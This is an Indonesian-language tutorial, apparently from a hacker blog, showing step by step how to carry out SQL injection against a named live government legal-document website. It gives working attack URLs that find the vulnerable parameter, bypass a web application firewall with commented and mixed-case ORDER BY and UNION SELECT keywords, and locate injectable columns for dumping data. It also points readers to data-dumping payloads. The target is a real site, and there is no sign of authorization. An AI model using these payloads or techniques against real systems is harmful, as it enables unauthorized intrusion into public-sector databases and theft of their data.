Halo gan, welcome!!
Yo gan langsung saja ya, pertama kita siapkeun dlu bahan bahannya:1. Koneksi internet
2. Browser
3. Live target
4. Kopi dan otak
Oke disini saya sudah menyiapkan live target, yaitu
http://jdih.madiunkab.go.id/ yak, siapin otak kalian
Step 1: mencari inject point.
Cara mencari inject point dalam sqli yaitu bisa dengan view source atau mengklik directory lain dalam web tersebut. Disini saya sudah mendapatkannya di parameter detail produk
Step kedua: kutip(')
Yak, setelah inject point kita akan mengetahui web tersebut vuln injeksi sql dengan tanda kutip(') atau dengan (/**). Disini kita pakai tanda kutip('). Cara mengetahui web itu vuln atau tidak yakni dengan berubahnya tampilan web atau ada tulisan
Warning: mysql_num_rows() expects parameter 1 to be resource, boolean given in
Dan lain lain
Step ketiga: order by
Setelah mengetahui webnya vuln langsung kita order by.
Langsung aja, disini kita akan bypass waf, tambahkan and true setelah kutip dan bypass order by nya, seperti:
http://jdih.madiunkab.go.id/?hal=detailprodukhukum&id=2017010007%27and%20true%20/*!12345ORDER*/%20/*!BY*/%201--%20- (ga error)
Dan yak, berubah kembali seperti tampilan awal, lgsg kita cari tab vulnnya, saya akan lgsg ke error aja
http://jdih.madiunkab.go.id/?hal=detailprodukhukum&id=2017010007%27and%20true%20/*!12345ORDER*/%20/*!BY*/%2010--%20- (error)
Oke kita dah tau errornya, langsung kita union select, step selanjutnya
Step ke empat: Union select
Pada step ini kita akan mencari angka ajaibnya:v , dalam step ini tambahkan character(-) sebelum parameter id dan bypass union selectnya, seperti
http://jdih.madiunkab.go.id/?hal=detailprodukhukum&id=-2017010007%27%20and%20true%20%23xyz%0AUnIOn%23xyz%0ASeLecT%201,2,3,4,5,6,7,8,9--%20-
Tampilannya akan seperti ini
Yak itu dia angka ajaibnya, banyak kan:v , itulah tempat naro dios dan hexanya pada angka tersebut, yak ini solved gua. Untuk dios kalian bisa cari di google dan untuk hex kalian hex html kalian di: https://www.online-toolz.com/tools/text-hex-convertor.php
Yak sekian terimakasih
By: ./D4nzX0